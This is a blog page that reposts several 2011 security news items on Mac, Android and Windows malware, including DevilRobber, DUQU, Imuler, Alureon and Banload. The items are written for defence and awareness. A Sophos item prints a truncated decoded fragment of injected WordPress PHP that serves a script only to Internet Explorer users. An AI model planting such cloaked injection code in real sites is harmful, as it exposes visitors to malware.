[+] Wayc0de's Blog[+]

Researchers have discovered a series of variants of the DevilRobber Mac OS X Trojan that have a menu of different capabilities, depending upon the strain, and can not only mine Bitcoins using the infected machine's processing power, but also steals files, installs a Web proxy and may steal the user's Safari browsing history.

The new variants of DevilRobber, which has been making the rounds recently, appear to each have a different set of capabilities because they may have each been built for specific jobs, according to an analysis of the malware by researchers at F-Secure. Some of the variants appear to be looking for specific pornographic files on infected Macs and steals passwords from the machine in order to access any files that may be protected. All of the variants of DevilRobber have the ability to take data from the machine and upload it to a remote server.
The new variants were discovered in legitimate Mac applications that had been Trojaned and then shared on Pirate Bay.

"The specific port used by the web proxy depends on the variant. The specific FTP server for data stealing also varies between samples. And DevilRobber's data stealing routine is repeated on a fixed interval — every 43200, 60000, or 100000 seconds, depending on the sample," F-Secure says in its analysis.

Mac malware has been making some headlines in the last few months, as attackers have begun applying to OS X some of the tactics they've been using on Windows for decades. In September, a Trojan called Imuler was found packed inside malicious PDFs, a trick that attackers have been using to get their malware into the hands of users for years now. And earlier in the year the MacDefender malware made a big splash as the first Mac-specific rogue antivirus program to emerge.

Apple is beginning to take some steps to address the threats facing its users, including the announcement this week that all apps submitted to the Mac App Store will have to have a sandbox by March 2012.

Read More...

We have been closely monitoring developments on the DUQU malware since our initial blog post when the threat broke the news. And just recently, the Hungary-based security laboratory that initially reported about DUQU released more information that sheds more light into the nature of the said threat.

Their report indicates that a Microsoft Word document that triggers a zero-day kernel exploit was identified as the dropper for DUQU. Upon successful exploitation, the Microsoft Word file drops the installer files that load the DUQU components that were initially reported a couple of weeks back.

The installer files are composed of a .SYS file detected as RTKT_DUQU.B, and a .DLL file detected as TROJ_DUQU.B. RTKT_DUQU.B loads TROJ_DUQU.B into the system. TROJ_DUQU.B, on the other hand, drops and decrypts the DUQU components, RTKT_DUQU.A, TROJ_DUQU.ENC, and TROJ_DUQU.CFG. Below is a simple behavior diagram of the threat.

Details regarding the zero-day exploit used have not yet been disclosed. However, Microsoft is expected to release information on it soon. As a member of the Microsoft Active Protections Program (MAPP), if Microsoft provides information on ways we can protect customers while a security patch is being developed, we will add these protections to our products as quickly as possible and update you with that information.

This new information allows us to have more educated theories of how the DUQU attack took place. Considering the usage of a Microsoft Word document, it is likely that this was initially deployed through email messages sent to employees in the targeted organization.This further verifies our earlier hypothesis that DUQU is part of a highly targeted attack aimed at exfiltrating information from targeted entities. For more information on DUQU and the nature of highly targeted attacks, please check the following reports:

We have created the proactive detections of TROJ_DUQUCFG.SME and RTKT_DUQU.SME to address future variants of DUQU component files. Also, the Threat Discovery Appliance (TDA) protects enterprise networks by detecting network activity and the malwares’ connection to the C&C server through the rules 473 TCP_MALICIOUS_IP_CONN, 528 HTTP_Request_DUQU, and 529 HTTP_Request_DUQU2.

Update as of November 3, 2011, 8:30 PM PST

Microsoft released a security advisory regarding the vulnerability used by DUQU.
The vulnerability exists in the Win32k TrueType font parsing engine and allows elevation of privilege. According to the advisory, a successful exploitation can allow an attacker to run arbitrary code in kernel mode.
We are currently collecting more information about this, and will update this blog entry with our findings as soon as possible. Read More...

Yesterday, users of Sophos's security products (including our free anti-virus for Mac home users) had their protection automatically updated to protect against a new Mac OS X Trojan horse that has been distributed via torrent sites such as PirateBay.

Copies of the legitimate Mac OS X image editing app GraphicConverter version 7.4 were uploaded to file-sharing networks. However, they came with an unexpected addition.

Hidden inside the download was a copy of the OSX/Miner-D (also known as 'DevilRobber') Trojan horse.

If your Mac computer was infected by the malware, the first thing you might notice is performance becoming sluggish.

Bitcoin

That's because OSX/Miner-D tries to generate Bitcoins, the currency of the anonymous digital cash system, by stealing lots of GPU (Graphics Processing Unit) time.
GPUs are much better than regular CPUs at performing the mathematical calculations required for Bitcoin mining.
Yes, this Mac malware is stealing computing time as well as data.

In addition to Bitcoin mining, OSX/Miner-D also spies on you by taking screen captures and stealing your usernames and passwords. In addition, it runs a script that copies information to a file called dump.txt regarding truecrypt data, Vidalia (TOR plugin for Firefox), your Safari browsing history, and .bash_history.

Curiously, the Trojan also hunts for any files that match "pthc". It's unclear whether this is intended to uncover child abuse material or not (the phrase "pthc" is sometimes used on the internet to refer to pre-teen hardcore pornography).
To complete the assault - if the malware finds the user's Bitcoin wallet it will also steal that.

OSX/Miner-D

Of course, the producers of GraphicConverter have done nothing wrong themselves - they are victims of the criminals who are using their popular software as a trap to infect Mac users who download software from unofficial sources.

It's possible that other apps have also been distributed via torrent sites infected by the malware, or that the cybercriminals will use other methods to distribute their Trojan horse.

Clearly, Mac users - like their Windows cousins - should practice safe computing and only download software from official websites and legitimate download services. But, in addition to that, it's becoming clearer every week that Mac users need to take malware protection more seriously by running anti-virus software.
There may be a lot less malware for Mac OS X than there is for Windows, but many Mac users are making themselves an unnecessarily soft target by imagining that they are somehow magically protected from threats.

There are a number of anti-virus products available for Mac, including Sophos's free version for home users, so there's really no excuse.

Read More...

As our friends at ESET have mentioned on their blog, new variants of the latest Mac malware - the Tsunami backdoor Trojan - have been discovered.

SophosLabs has received a few new samples of the malware - which can be used both to launch denial-of-service attacks and by remote hackers to gain access to your computer.

The new versions, which Sophos is adding detection for as OSX/Tsunami-Gen, are builds for 32-bit Intel x86 and PowerPC Mac computers, whereas the original version was 64-bit only. In addition, the new samples use a different IRC domain for their command & control server.

Some folks have questioned why the computer security industry has dubbed this threat "Tsunami", and I must admit that I find myself feeling somewhat uncomfortable with the name because of the devastating natural disasters that have struck in some parts of the world.

The truth is, however, that the name derives from one of the commands that can be sent to computers running the malicious code, to flood a target with internet traffic.

Tsunami command

It's actually the same command that was built into the Linux version of the attack tool (which Sophos calls Troj/Kaiten) first seen some years ago.

Because we see considerably less malware for Mac OS X than we do for Windows, new Mac threats tend to make the news headlines. It's important to note that the sky is not falling, and we believe the threat posed by OSX/Tsunami is currently quite low. Indeed, we have not received any reports from customers yet of infections by this Mac malware.

Nevertheless, it's clear that someone is working on developing new versions of this code for the Mac platform and you have to presume they are not doing it purely for the intellectual challenge. (If they are, Lord help them.. it's not much of a challenge)

Mac users would be wise to take preventative steps against this, and the other malware which we see for the Mac OS X platform. Free anti-virus software is available for Mac home users - so there's really no excuse.

Read More...

A new DroidKungFu variant poses as a legit application update

A new variant of the DroidKungFu Android Trojan is posing as a legitimate application update in order to infect handsets, according to security researchers from Finnish antivirus vendor F-Secure.

Distributing Android malware as updates is a relatively new tactic that was first seen in July. The primary method of infecting handsets continues to be the bundling of Trojans with legitimate applications; however, the resulting apps are easy to spot because of the extensive permissions they request at installation time.

[ Find out how to block the viruses, worms, and other malware that threaten your business, with hands-on advice from InfoWorld's expert contributors in InfoWorld's "Malware Deep Dive" PDF guide. ]

According to security researchers, the new update-based attacks can have a higher success rate than "Trojanizing" apps because users don't tend to question the legitimacy of updates for already-installed software.

Furthermore, when used by threats like DroidKungFu, update attacks can be hard to detect without specialized antimalware tools. That's because these Trojans use Android exploits to gain root access and then deploy their malicious components unhindered.

The new DroidKungFu variant is distributed with the help of a non-malicious application currently available from third-party app stores in China. However, the threat is global because apps infected with earlier versions of the Trojan have been detected on the official Android Market in the past.

"Once installed, the application would inform the user that an update is available; when the user installs this update, the updated application would then contain extra functionalities, similar to that found in DroidKungFu malware," the F-Secure researchers warn.

The update only asks for access to SMS/MMS messages and location, but also contains a root exploit for Android 2.2 "Froyo" that unlocks all system files and functions. Even though this particular DroidKungFu variant doesn't target devices running Android 2.3 "Gingerbread," there are other Trojans that infect this version of the operating system and could adopt the same attack technique in the future.

In addition, there is reason to believe that the malware's authors are also testing other infection methodologies. Last week, security researchers from mobile antivirus vendor Lookout detected another DroidKungFu variant that doesn't use root exploits at all.

Instead, the new Trojan, which Lookout calls LeNa, uses social engineering to trick users into giving the installer super-user access on devices where users have knowingly executed a root exploit. Once deployed, the malware attaches itself to a native system process.

"This is the first time an Android Trojan has relied fully on a native ELF binary as opposed to a typical VM-based Android application," the researchers explained. The malware is distributed by rogue VPN applications, some of which were found on the official Android Market. Read More...

A report from Symantec claims that malware authors tricked an untold number of Netflix users into coughing up their account credentials with a Trojan horse application that doubled as a Netflix app for the Android platform.

In a blog post, Symantec researcher Irfan Asrar writes about a new piece of malware, Android.Fakenflick (not to be confused with NPR star reporter David Folkenflick, mind you), which looks identical to the legitimate Neflix application, but sends any user name and passwords entered via the Android phone to a remote server controlled by the attackers. According to Symantec, the malware was first identified on October 10 and has been linked to just a small number of infections. After accepting the user's Netflix credentials, the malware displays an message saying the Android phone is not supported by the application, which is then uninstalled.

The malware is designed to look and behave exactly like the legitimate Netflix application for Android - with a similar look and feel. The application also requests the same permissions of the phone user. Asrar hypothesizes that malware authors were simply jumping on an opportunity to get hungry Netflix users to download their malware, after Netflix released an official Android application that only ran on certain Android phones. An ad hoc effort sprang up to port the app to non supported platforms. Users who downloaded Fakenflick may have thought they were getting a grayware ported version of the application. Google's Android mobile operating system has been a leading target of mobile malware writers in the last year. Researchers have uncovered Android versions of popular Windows malware like the Zeus banking Trojan. In June, researchers at North Carolina State University also rang the alarm about a new and stealthy piece of spyware dubbed "Plankton" that was lurking on the Android Marketplace. Google says it suspended a number of applications from the Marketplace in the wake of that revelation The company was already struggling with a persistent infections of Marketplace applications with the DroidDream malware. Kaspersky Lab researchers found that the number of malware signatures for the Andoid operating system tripled between the first and second quarters of 2011, from just 50 to 150. Read More...

Microsoft was forced to push out an emergency update to its Security Essentials and Forefront products Friday after users complained that an updated virus signature intended to spot the Zeus Trojan was, instead, flagging and even removing instances of Google's Chrome Web browser.

The fireworks began early Friday, after Microsoft released an otherwise innocuous signature update for the common Zeus - or Zbot - banking Trojan.

Shortly after it was released, users of Microsoft's Windows Security Essentials and Forefront Security began complaining on Twitter that the products were flagging Chrome as evidence of a Zbot infection and encouraging users to uninstall the product. The Redmond, Washington software firm responded quickly to the complaints, releasing an update to the signature within hours that corrected the detection problem, according to a post on Microsoft's Web page.

"On September 30th, 2011, an incorrect detection for PWS:Win32/Zbot was identified. On September 30th, 2011, Microsoft released an update that addresses the issue." the company said, without mentioning that it was the Chrome browser that was affected.

But users took notice, with many, mindful of Microsoft's reputation as a no-holds-barred competitor, wondering whether the bad signature was a slip-up or a stealth effort to grab back some market share.

"Classifying your competition as malware might be taking things too far MS," wrote a Twitter user with the handle @bryanbrannigan. "Love it! Microsoft Security Essentials just zapped my Google Chrome browser. Let the war begin!" wrote a Twitter user with the handle @EnukSears.

Chrome users who took the bait and allowed their browser to be removed by the Microsoft anti malware were less pleased. Uninstalling Chrome can cause the loss of bookmarks and other browser plug-ins, as well as require a restart of the "infected" system.

Zeus is a ubiquitous Trojan horse program that is often used to steal credentials from online banking customers using both Windows and common mobile platforms. The Zeus source code was leaked online in May and now Zeus components are showing up in a wide range of malware.

Read More...

Mac malware is back in the news again. Last week, security firm F-Secure warned that it had discovered a Trojan built for OS X that was disguised as a PDF document. It’s not clear whether this malware is a present threat — it was apparently created earlier this year — but the mechanics of how it works are worth a closer look because it challenges a widely-held belief among Mac users that malicious software cannot install without explicit user permission.

F-Secure said the Mac malware, Trojan-Dropper: OSX/Revir.A, may be attempting to copy the technique implemented by Windows malware, which opens a PDF file containing a “.pdf.exe” extension and an accompanying PDF icon. F-Secure was careful to note that the payload installed by the dropper, Backdoor:OSX/Imuler.A, phones home to a placeholder page on the Web that does not appear to be capable of communicating back to the Trojan at the moment.

I wanted to understand a bit more about how this Trojan does its dirty work, so I contacted Broderick Aquilino, the F-Secure researcher who analyzed it.

Aquilino said the sample is a plain Mach-O binary — which we’ll call “Binary 1″, that contains PDF file and another Mach-O binary (Binary2). Mach-O, short for Mach object, is a file format for executable files on OS X.

According to Aquilino, when you run Binary1, it will extract the PDF file from its body, drop it in the Mac’s temporary or “tmp” directory, and then open it. This is merely a decoy, as Binary1 continues to extract Binary2 from itself — also into the “tmp” directory — and then runs the file.

Upon execution, Binary2 downloads another binary from [omitted malware download site] and saves it as /tmp/updtdata. For the sake of continuity, we’ll call this latest file “Binary3.” Binary2 then executes and downloads the third binary, which opens up a backdoor on the OS X host designed to allow attackers to administer the machine from afar.

“All of this happens without the user needing to input their password,” Aquilino said.

Aquilino believes the Trojan drops its files into the “tmp” directory because the malware is not meant to be permanent.

“Another reason could be that the Trojan is avoiding the need for users running under a Standard account to be authenticated with an Admin account just to be able to infect the system,” he said. “Standard accounts only have access to their home directory and those such as /tmp. However the account created by OS X setup is an Admin account. Therefore, I believe most will be running under it.

Given that assumption, other malwares can choose to run in directory such as /Application just like the case of the Fake MacDefender rogue. Take note though unlike in earlier Windows versions, Admin accounts in OS X are still required to input their password if a malware choose to put its files in system directory such as /System/Library. I don’t see the need for a malware to do that though.”
Aquilino said the malware nevertheless has the potential to be very persistent.

“Upon execution, the downloaded copy of the backdoor (/tmp/updtdata) will create a copy called /users/%user%/library/LaunchAgents/checkvir. It will also create a corresponding launch point in /users/%user%/library/LaunchAgents/checkvir.plist to make sure it still runs after the user rebooted the system. Take note of the casing in ‘library’ instead of ‘Library.’ This maybe the reason why the sample didn’t work on some test machines. Again, no password is needed since the backdoor install its files in the user’s home directory (%user%).”

Aquilino observed that the backdoor will only run when the infected account logs in, but he said this doesn’t mean that other accounts on the infected machine are safe.

“The risk is the same if these accounts save their files in shared volumes where the infected account has permission to,” he said.

In other Mac malware news, Mac security vendor Intego is warning about an OS X Trojan called “Flashback” that disguises itself as a Flash update.

It’s worth noting that these threats, like most of those facing Windows users today, rely on social engineering — tricking the user into clicking an attachment or link. Regardless of which operating system you use, it’s a good idea to develop a healthy sense of skepticism and paranoia about any unexpected documents that arrive via e-mail, or random prompts to “update” software. Rule #1 from my 3 Basic Rules for Online Safety applies just as well to Mac users as it does folks using Windows: “If you didn’t go looking for it, don’t install it!”

I still don’t believe it’s necessary for Mac users to install anti-virus software, but for those who disagree there are certainly a number of free and affordable options for anti-malware protection on OS X. Sophos offers a free anti-virus product for the Mac, as does ClamXav and PCTools. There are also several non-free options. Read More...

Mac malware is still quite rare, but there is one new threat floating around that you should be aware of. A new Trojan for Mac OS X disquises itself as an installer for the Adobe Flash Player browser plug-in, according to security software company Intego. The good news (if you want to call it that)? This new malware doesn't appear to have spread very far as of yet.

According to Intego, this Trojan spreads via malicious sites that feature links asking you to download Flash Player (recent versions of Mac OS X don't come with Flash Player pre-installed). Instead of being taken to the Adobe Flash site when clicking the link, you'll inadvertantly download the Trojan instead. The Trojan looks and acts like any typical Mac installer package--in fact, if you have the "Open 'safe' files after downloading" box checked in Safari, the installer will open automatically.

Intego is still trying to learn more about this particur Trojan, but the company says that "the installer for this Trojan horse will deactivate some network security software, and, after installation, will delete the installation package itself." From there, the Trojan "installs a dyld (dynamic loader) library and auto-launch code, allowing it to inject code into applications the user launches." Put in English, it basically turns good apps bad by making them run malicious tasks.

The malware then gathers information about your Mac, including its MAC address, and sends it to a server, which, according to Intego, "will allow the malware to detect if a Mac is infected."

But there's no need to panic: Intego says they've received only one report of this malware in the wild, so as of right now, this particular Trojan doesn't appear to have spread very far.

To keep it from spreading further, and to keep from becoming its next victim, there are a couple steps you can take. First, only download and install the version of Flash available directly from Adobe. Not only does it ensure that you'll get the real thing, but it ensures that you'll get the latest version, complete with the newest security fixes.

Also, if you use Safari, select Preferences from the Safari menu, click General, then un-check the box labeled "Open 'safe' files after downloading". This will prevent installers and other files (images, text documents, etc...) from opening automatically when you download them. In addition, don't open any downloads that you weren't expecting--this will prevent you from being taken advantage of by so-called drive-by downloads and other threats.

nb : pcworld

Read More...

The Alureon rootkit has become not just a major headache for its victims, with its insidious infection routines and persistence once on a machine. But it also has proved to be a challenge for researchers engaged in trying to identify new versions and unwind its new tactics and techniques. The latest hurdle thrown up by Alureon is the use of steganography to hide configuration files to update infected machines with new instructions.

The steganography usage has shown up in a specific version of Alureon that often is downloaded by a Trojan and then installed on the victim's machine. The malware has a new function that goes out to a remote Web site and downloads a new component called "com32", which, once decrypted, presents a list of URLs hosted on LiveJournal and WordPress. Each of the pages simply hosts a series of image files, which look to be harmless at first glance. But when researchers at Microsoft looked deeper into the code that is responsible for retrieving the image files, they discovered that the code looks specifically for some IMG HTML tags.

The rootkit then tries to pull down the JPEGs, and along with the image data comes a long string of characters that looks to be a password of some kind, according to the analysis by Scott Molenkamp of Microsoft's Malware Protection Center.

"After further investigation, I was able to determine that embedded within each of the JPGs was a complete configuration file using steganography. One of the critical sections of the configuration file contains the list of command and control servers. The purpose of the publically hosted data was revealed -- it's there to provide a layer of redundancy and defense against existing domains that might become unavailable. In the event that no command and control server could be contacted, Alureon would then seek to retrieve an updated configuration file from these 'backup' locations," Molenkamp wrote.

The images being used to hide the configuration file look to be completely random, unless the attacker behind Alureon is a health nut who loves his grandma and "Tropic Thunder." The JPEGs include a picture of an elderly woman, a bowl of something sort of health-food looking and...Tom Cruise.

Alureon, which also is known as TDSS or TDL4, has been a serious problem for a couple of years now. The addition of a steganography routine is just the latest in a line of new features added to the malware in the last few months. Earlier this year researchers came across a version of Alureon that was using an older brute-force technique in order to decrypt some components of its own code that are encrypted. And in June another variant appeared that had its own self-replicating loader which allowed Alureon to spread via network shares once it's on a victim's machine.

nb : threatpost Read More...

USA Today is the latest high profile Twitter account to have fallen victim to a group of hackers.

A group calling themselves the Script Kiddies have claimed responsibility for the hack, which involved posting a series of messages to the official USA Today Twitter account, including:

"Fox News, Wal-mart, Unilevel, Pfizer, NBC and now USA Today. who's next? Vote now! [LINK]"

and

"Please like The Script Kiddies on Facebook! You could choose our next target!"

Fortunately, USA Today was able to regain control of the account (with some assistance from Twitter) before any serious harm could be caused. The newspaper tweeted an apology to its followers:

USA Today apologised for the hack

The Script Kiddies group has previously claimed responsibility for hacking into the NBC News Twitter account to post fake news reports of a terrorist attack involving planes in New York, defacing Pfizer's Facebook page and breaking into the Fox News Politics Twitter account to post a bogus announcement about the death of Barack Obama.

It's unclear how the USA Today Twitter account was compromised, but there was speculation that the hack by the same group against NBC News's Twitter account was assisted by a spyware Trojan horse.

The Script Kiddies might believe that their hacks against media organisations are just childish pranks, but it's unlikely that the authorities find them amusing. The more social media accounts that they target, the more the computer crime police will be keen to bring them to justice.

As always, we recommend that social networking users ensure that they keep their security software up-to-date, choose hard-to-crack passwords and do not use the same password in more than one place.

nb : nakedsecurity.sophos

Read More...

The Trojan code is crude and can't yet connect to control server, say security firms

Security firms today warned Mac users of a new Trojan horse that masquerades as a PDF document.

The malware, which was spotted by U.K.-based Sophos and Finnish antivirus vendor F-Secure, uses a technique long practiced by Windows attackers.

[ Discover the key Mac, iOS, and Apple tech trends for business users. Read InfoWorld's Technology: Apple newsletter. ]

"This malware may be attempting to copy the technique implemented by Windows malware, which opens a PDF file containing a '.pdf.exe' extension and an accompanying PDF icon," said F-Secure today.

That practice relies on what is called the "double extension" trick: adding the characters ".pdf" to the filename to disguise an executable file.

The Mac malware uses a two-step process, composed of a Trojan "dropper" utility that downloads a second element, a Trojan "backdoor" that then connects to a remote server controlled by the attacker, using that communications channel to send information gleaned from the infected Mac and receiving additional instructions from the hacker.

Because it doesn't exploit a vulnerability in Mac OS X -- or any other software -- the malware instead must dupe users into downloading and opening the seemingly-innocuous PDF document, which is actually an executable.

Once run, the dropper downloads the second-stage backdoor and opens a Chinese-language PDF. F-Secure said that the PDF was another sleight-of-hand trick: "[The dropper component] drops a PDF file in the /tmp folder, then opens it to distract the user from noticing any other activity occurring," the company said in a description of the attack.

Both Sophos and F-Secure noted that the malware doesn't work reliably, and currently can't connect to the C&C (command-and-control) server because the latter isn't fully functional.

Mac malware is typically crude in comparison with what targets Windows PCs.
Because the C&C server is not yet operational and since it found samples of the Trojans on VirusTotal -- a free service that runs malware against a host of antivirus engines -- F-Secure speculated that the malware is still in the testing phase.

Although Apple's Mac OS X includes a bare-bones antivirus detector, it has not been updated to detect the just-noticed Trojan dropper or backdoor. Checks of several Computerworld Macs running Lion, for instance, found that Apple last updated its detector on Aug. 9.

Mac users had their biggest malware scare earlier this year, when a series of fake security programs, dubbed "scareware," were aimed at them.

Several antivirus companies, including Sophos, F-Secure and Intego, offer security software for the Mac.

nb : infoworld Read More...

Summary: The malware installs a backdoor that contacts a remote server for instructions and can be used to steal files or capture a screenshot of the infected computer system.

Researchers at F-Secure have discovered a Mac OS X malware file masquerading as a PDF file to lure users into installing a backdoor trojan.

The malware, flagged as a trojan dropper, installs downloader component that downloads a backdoor program onto the system, while camouflaging its activity by opening a PDF file to distract the user.

According to F-Secure, the PDF file contains Chinese-language text related to political issues, which some users may find offensive.

The use of a PDF file as a social engineering gimmick is widely used by malicious hackers on the Windows platform and F-Secure’s research team believes this is an attempt to copy the trick of opening a PDF file containing a “.pdf.exe” extension and an accompanying PDF icon.

“”The sample on our hand does not have an extension or an icon yet. However, there is another possibility. It is slightly different in Mac, where the icon is stored in a separate fork that is not readily visible in the OS. The extension and icon could have been lost when the sample was submitted to us. If this is the case, this malware might be even stealthier than in Windows because the sample can use any extension it desires,” the company said.

Once installed, the trojan dropper installs a backdoor program that gives a hacker full control of the infected Mac OS X machine.

The backdoor typically contacts a remote server for instructions and can be used to steal files or capture a screenshot of the infected computer system, which is then forwarded to the remote server.

F-Secure reports that the command-and-control of the malware is just a bare Apache installation that is not yet capable of communicating with the backdoor.

nb : zdnet

Read More...

A fascinating new example of Mac malware has been discovered, that appears to be adopting an old Windows-style disguise to fool users into running it.

Despite the numerous times that cybercriminals have created boobytrapped PDF files that exploit vulnerabilities to infect unsuspecting users, many people still think that PDF files are somehow magically safer to open than conventional programs.

The OSX/Revir-B Trojan plays on this by posing as a PDF file.

When the malicious Macintosh application file is run it tries to drop a PDF embedded inside it onto the user's hard drive. The Chinese language PDF file displayed is about a controversial topic, "Do the Diaoyu Islands belong to Japan?"

The Diaoyu Islands (known as the Senkaku islands in Japan) are the subject of a long-running dispute between the two countries, with both claiming sovereignty.
Because the document is opened, users may believe that they have opened a harmless PDF rather than run a program.

Malicious PDF

When we tested the malware inside our labs, we couldn't manage to get it to execute as the author probably intended - however, strings embedded deep inside its code make it clear that it was written with malicious intent.

Malware code

The malware attempts to install a backdoor Trojan horse (detected by Sophos as OSX/Imuler-A) which would give malicious hackers remote access to your Apple Mac computer.

As our friends at F-Secure point out, we have seen plenty of Windows malware in the past which has pretended to be a PDF rather than an EXE - sometimes using techniques such as the double-extension trick (for instance, filename.PDF.EXE).

It's quite possible that this is evidence that Mac malware authors are attempting something similar, moving on from the fake anti-virus alerts that blighted many Mac users earlier this year.

Customers of Sophos, including users of Sophos's free anti-virus for Mac, are protected against the malware.

nb : nakedsecurity.sophos

Read More...

Malware that targets Mac OS X isn't anywhere near catching up to Windows-based malware in terms of volume and variety, but it seems that OS X malware may be adopting some of the more successful tactics that Windows viruses have been using to trick users. Researchers have come across a sample of an OS X-based Trojan that disguises itself as a PDF file, a technique that's been in favor among Windows malware authors for several years now.

The new piece of malware hides inside a PDF file and delivers a backdoor that hides on the user's machine once the malicious file is opened. Once the user executes the malware, it puts the malicious PDF on the user's machine and then opens it as a way to hide the malicious activity that's going on in the background, according to an analysis by researchers at F-Secure. The Trojan then installs the backdoor, which is named Imuler.A, which attempts to communicate with a command-and-control server.

That server isn't capable of communicating with the malware, however, the researchers found, so the malware is on its own once it's installed on a victim's machine. What's not clear is exactly how the malware is spreading right now.

"This malware may be attempting to copy the technique implemented by Windows malware, which opens a PDF file containing a ".pdf.exe" extension and an accompanying PDF icon. The sample on our hand does not have an extension or an icon yet. However, there is another possibility. It is slightly different in Mac, where the icon is stored in a separate fork that is not readily visible in the OS. The extension and icon could have been lost when the sample was submitted to us. If this is the case, this malware might be even stealthier than in Windows because the sample can use any extension it desires," the analysis by F-Secure said.

Windows-based malware variants have been using the same sort of techniques for hiding themselves for a long time now. They often use common file extensions such as DOC, PDF, XLS and others to entice users into opening the malicious file. In some cases, the malware may not have the proper icon to go along with the fake file extension, as is the case with the Mac OS X Revir.A malware that F-Secure identified. It's a simple trick, but it's still quite effective and users have shown themselves to be willing to open these files, regardless of the potential consequences.

nb : threatpost Read More...

There are many techniques used by malware in the banker family to steal user’s authentication credentials for online banking sites. We came across an interesting sample recently, detected as Trojan:Win32/Banload.A, which uses a remote proxy script in order to target online banking sites and facilitate data theft.

When Trojan:Win32/Banload.A is executed, it opens an Internet browser to a certain animation site to trick the user into thinking that it’s nothing but an animation file:

However, the cute animation masks the main objective of this trojan, which is to modify the web browser settings to use a Proxy Automatic Configuration script… And once set, that’s it! Mission accomplished! This malware’s job is done, for now…

By using a proxy configuration script, the trojan sets the user’s Internet connection to be routed through a proxy server.

Affected users should note that in the case of Trojan:Win32/Banload.A, because it makes changes to the proxy settings, removing the malware will not be enough to fix an affected computer and return it to a pre-compromised state. The configuration settings will need to be fixed manually. Without changing these settings, while the remote script remains available, the affected computer will still be utilizing it. The script effectively moderates the affected user’s Internet use – possibly providing false information and redirecting the user away from sites of their choice to sites of the attacker’s choice – with the affected user being none the wiser.

MMPC downloaded the Proxy Script from the URL (shown in the above graphic) and found it to be malicious; we detect it as TrojanProxy:JS/Banker.B. It contains code that monitors for online banking sites visited by the affected user, and redirects traffic to a proxy server that could result in the theft of authentication credentials or other sensitive information.

In order to change these proxy settings:

1. In Internet Explorer, click the Tools menu, and then click Internet Options.

2. Click the Connections tab, and then click LAN Settings.

3. In the Automatic configuration area, de-select Use automatic configuration script.

4. Click OK.

For more information about using automatic proxy configuration, see the following articles:

SHA1s:
C3D1E6E68CC5241F92F22C07F120487C0AFB03D4
c93c7823c5ba4fe39a91964c8db08f413262719e
0525cbdce83410586a7707c10aea49e87c3f8a19

nb : technet Read More...

On Friday, a colleague in our IT department asked about a Mal/Badsrc-C malware detection that had been found by Sophos products on one of their friends' websites.

When I initially downloaded the website it looked clean. However, the automated systems inside SophosLabs were detecting the webpage as being infected with Mal/Badsrc-C.

So, I investigated a little more deeply - repeating the download after setting the User-Agent in my browser to pretend to be Internet Explorer.

This time I saw:

>>> Virus 'Mal/Badsrc-C' found in file index.html

Clearly, the malware on the website was planted in such a way that it would only manifest itself if it believed that the computer visiting the webpage was running Internet Explorer.

When you look at the last line of the index.html file you can see the appended malicious script tag:

As my colleague knew the affected website's owner, I was able to gain a complete copy of the site which was running an installation of the popular WordPress blogging platform.

Looking at the WordPress configuration file (wp-config.php) I saw a suspicious piece of code prepended:

When this code is run it decodes to some suspicious code:

stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 7")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 9")){ return base64_decode("PHNjcmlwdCBzcm...

The above code snippet means that malicious code will only be served if the User-Agent is Internet Explorer. The geekier amongst you will recognise the base64 string as being the beginning of:

<script src

Sophos now detects and disinfects this modified code as Troj/PHPShll-B.

So, what's happened is that somehow malicious code has managed to inject itself into the PHP code used on some websites running WordPress, meaning that if you visit them when running Internet Explorer you could be exposing yourself to a malware attack.

What isn't clear is exactly how the malicious code managed to embed itself on the website, although it was most probably via compromised FTP credentials.

If you run a site which uses WordPress you would be wise to ensure that your passwords are chosen carefully (not dictionary words, and not easy to guess) and that you are not using the same credentials on any other websites. If you think it's possible that your password details may have been stolen - or if you use the same passwords elsewhere on the internet - change them immediately.

Furthermore, you should be regularly auditing the code on your site to ensure that there have not been any unauthorised changes.

Finally, always ensure that your website software is up-to-date and fully patched.
This hack appears to be widespread and website owners need to be vigilant.

nb : nakedsecurity.sophos

Read More...

Secured boot' will be the biggest new protection; most of the rest are enhancements from what appeared in Windows 7 and earlier

Windows 8 will ship with a number of small but important security tweaks Microsoft hopes will make it a harder target for the viruses, worms, and Trojans that were able to subvert older versions of the operating system.

Most of the security features mentioned by Windows president Steven Sinofsky at this week's Build conference extend design features that appeared in Vista and Windows 7 and have gradually been added through updates.

[ InfoWorld's Neil McAllister examines how Windows 8 is a big bet for Microsoft that could pay off well for developers. | InfoWorld's expert contributors show you how to secure today's Windows in the "Windows 7 Security Deep Dive" PDF guide. ]

These include address space layout randomization (ASLR), which will be used more extensively in Windows 8, as will a new feature that protects the core of the OS from what are called "kernel-mode null dereference vulnerability," basically a way for an attacker to elevate privileges once on the system. Windows 8 will also make extensive use of memory heap randomisaiton, another technique tried on Windows 7, which makes it difficult for malware programmers to overrun the space given to an application for malicious purposes.

Probably the biggest security addition is Windows 8's support for UEFI 2.3.1 secured boot technology (which requires BIOS support), which stops early-booting malware from interfering with antivirus products before they load into memory.

None of these changes are particularly radical but they continue the design policy of restricting as far as possible what applications can do on the platform without upsetting the OS. Of course, in the Web 2.0 world, what an application can do is increasingly governed by software interfaces other than those looked after the OS.

Sinofsky did remind developers of the importance of the company's security development life cycle (SDL), the coding, testing, and design system it came up with to avoid the security oversight that causes so many problems for Windows XP a decade ago. "Some malware is as complex as commercial applications," said Sinofsky notes in a blog on the environment in which Windows 8 will be operating.

Microsoft has also spotted an interesting clue as to why a sizable minority of PCs seem to lack adequate antivirus protection: People use free antivirus that comes with a new PC but then fail to subscribe after trial periods expire.

"Shortly after Windows 7 general availability in October 2009, our telemetry data showed nearly all Windows 7 PCs had up-to-date antimalware software," said Sinofsky. "A year later, at least 24 percent of Windows 7 PCs did not have current antimalware protection. Our data also shows that PCs that become unprotected tend to stay in this unprotected state for long periods of time."

Microsoft's biggest security challenge with Windows 8 remains the same one the company had with Windows 7: a core of stubborn users refuses to upgrade from older operating systems, especially XP. This, critics might point out, is largely Microsoft's fault for shipping five versions of the operating system since the year 2000, a marketing approach that left some users unsure as to the value of paying for a new version.

nb : infoworld Read More...

The amounts stolen and the number of large organizations potentially impacted is cause for serious concern, says Trend Micro

